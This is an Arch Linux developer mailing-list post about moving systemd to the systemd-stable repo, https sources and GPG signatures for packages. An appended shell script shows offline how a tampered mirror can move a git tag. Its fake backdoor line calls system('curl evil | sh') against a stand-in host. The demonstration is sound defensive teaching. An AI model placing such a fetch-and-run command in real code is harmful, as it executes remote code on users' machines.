[arch-dev-public] switching to systemd-stable

Jelle van der Waa jelle at vdwaa.nl
Thu Jul 6 08:42:00 UTC 2017


On 07/06/17 at 09:44am, NicoHood wrote:
> On 07/06/2017 09:12 AM, Bartłomiej Piotrowski wrote:
> > On 2017-07-06 02:11, NicoHood wrote:
> >> On 07/05/2017 12:10 AM, Christian Hesse wrote:
> >>> Dave Reisner <d at falconindy.com> on Sat, 2017/07/01 13:22:
> >>>> Hey all,
> >>>>
> >>>> This should be pretty much a no-brainer, but wanted to be sure I wasn't
> >>>> missing anything. Systemd upstream publishes a "systemd-stable" repo [1]
> >>>> which branches at each tag and cherry-picks backports. I'd like to
> >>>> switch our systemd package to this repo to avoid some of the duplication
> >>>> of work that Jan, Christian and myself have done in the past. The repo
> >>>> sees a bunch more activity than what our own backporting strategy has
> >>>> been, and I see that as a positive.
> >>>
> >>> Just a little heads-up... systemd 233.75-1 landed in [testing]. So give it a
> >>> try! ;)
> >>>
> >>> BTW, we had just one backported commit to be removed, so 74 new commits
> >>> landed in this package compared to 233-7. Let's hope this gives some benefit.
> >>>
> >>
> >> Systemd still does not use https sources. Regarding the recent
> >> discussion about tricking git about wrong tags and other evil stuff it
> >> is highly recommended to switch to https. Please do it in favor for all
> >> ArchLinux users security.
> >>
> >> Once more the reference:
> >> https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/torres-arias
> >>
> > 
> > Regarding the recent discussion:
> > 
> > https://lists.archlinux.org/pipermail/arch-dev-public/2017-July/028919.html
> > 
> > I really hoped I don't have to put "NicoHood" on top to make you realize
> > it's addressed to you. Please do it in favor for all Arch Linux packagers.
> > 
> What are you blaming me for now? This is a package everyone must install
> and you are telling me we have other serious problems? Sure we have, but
> compared to the time it takes to add an "s" to "http" this is a simple
> excuse. And this is not about checksums man, this is about https where
> even gpg signatures by git can be tricked.

I believe that a large group of Dev/Tu's do believe that security is a
serious issue and that we should put some effort into security. And I
can't thank everyone enough who has done a lot of work for example for
the Security Tracker. A few people have worked hard, without much
complaining and really made a difference.

For the whole signing issue we have a todo list for GPG signatures and
never decided as far as I know on the sha256 or sha512 (or any poison)
sums. Yet there is one individual in our community who keeps harassing
(yes it's called harassment) Dev/Tu's to get GPG / HTTPS in PKGBUILD's.

I would appreciate it if the discussion regarding GPG sigs etc,
would be less dramatic. I'm kinda done with these requirements if I keep
getting bugged that it's missing md5sums, https while I have a GPG sig.
Calling out people, bugging them, isn't really the method to get things

Note that this is my personal opinion, I surely do not speak for Arch as
a whole. 

> And yes, I am doing stuff in the background. I wrote a guide and a tool
> that simplifies source code signing[1] and I am doing a detailed
> security analysis on all ArchLinux packages. And once it is ready I will
> request gpg signatures from every upstream source, especially packages
> from [core].

I appreciate the effort of contacting upstream about providing GPG
signatures, that's really great!

Jelle van der Waa
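The tag-tampering concern raised in the thread (a fetch over an unauthenticated transport lets a man-in-the-middle or a compromised mirror decide what a tag name resolves to) can be shown without any network at all. The script below is an added example, not code from the thread, from Arch or from systemd: it builds a throwaway "upstream" repository and a tampered "mirror" in a temporary directory, then compares what a tag-name pin (the `#tag=` fragment of a PKGBUILD git source) and a commit-hash pin (`#commit=`) resolve to on the tampered copy. Repository contents, names and the "backdoor" commit are all constructed for the demo.

```shell
#!/bin/sh
# Added example, not code from the thread or from Arch Linux. Demonstrates why
# a git source pinned only by tag name trusts whatever the server currently
# says the tag points to, whereas a pin on a full commit hash does not.
# Everything below is constructed in a temporary directory; no network is used.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
# Fixed identity and no signing, so the demo runs on any git installation.
GIT="git -c user.name=demo -c user.email=demo@example.invalid -c commit.gpgsign=false"

# Build "upstream" with release commit A tagged v1.0, then a tampered "mirror"
# (what an attacker in the path of an unauthenticated git:// or http:// fetch
# could serve) that adds a malicious commit B and force-moves v1.0 onto it.
setup_repos() {
    $GIT init -q "$WORK/upstream"
    echo 'int main(void) { return 0; }' > "$WORK/upstream/main.c"
    $GIT -C "$WORK/upstream" add main.c
    $GIT -C "$WORK/upstream" commit -q -m 'release 1.0'
    $GIT -C "$WORK/upstream" tag v1.0
    $GIT -C "$WORK/upstream" rev-parse 'v1.0^{commit}' > "$WORK/good_commit"

    $GIT clone -q "$WORK/upstream" "$WORK/mirror"
    echo 'int main(void) { system("curl evil | sh"); return 0; }' > "$WORK/mirror/main.c"
    $GIT -C "$WORK/mirror" commit -q -am 'backdoor'
    $GIT -C "$WORK/mirror" tag -f v1.0 >/dev/null   # same tag name, new target
}

# What a "#tag=v1.0" pin resolves to when fetched from the mirror.
tag_target() {
    $GIT -C "$WORK/mirror" rev-parse 'v1.0^{commit}'
}

# Returns 0 only if the mirror's v1.0 still names the genuine release commit.
tag_is_genuine() {
    [ "$(tag_target)" = "$(cat "$WORK/good_commit")" ]
}

# A "#commit=<hash>" pin: inspect exactly that object on the mirror. The hash
# covers the whole tree, so the attacker cannot change what it contains.
# Returns 0 if the pinned commit still carries the genuine release content.
commit_pin_is_genuine() {
    good=$(cat "$WORK/good_commit")
    $GIT -C "$WORK/mirror" show "$good:main.c" | grep -q 'return 0; }' &&
    ! $GIT -C "$WORK/mirror" show "$good:main.c" | grep -q evil
}

setup_repos
echo "genuine release commit: $(cat "$WORK/good_commit")"
echo "mirror's v1.0 now resolves to: $(tag_target)"
if tag_is_genuine; then
    echo "tag pin: unchanged"
else
    echo "tag pin: moved, a build using #tag=v1.0 would compile the backdoor"
fi
if commit_pin_is_genuine; then
    echo "commit pin: still the genuine release content"
fi
```

The point is that a tag is a mutable ref, not a digest of content: transport security (https) stops an on-path attacker from rewriting it, and a full commit hash pin removes the dependence on the server altogether. A signed tag is a further check, but only if the build actually verifies the signature rather than just resolving the name.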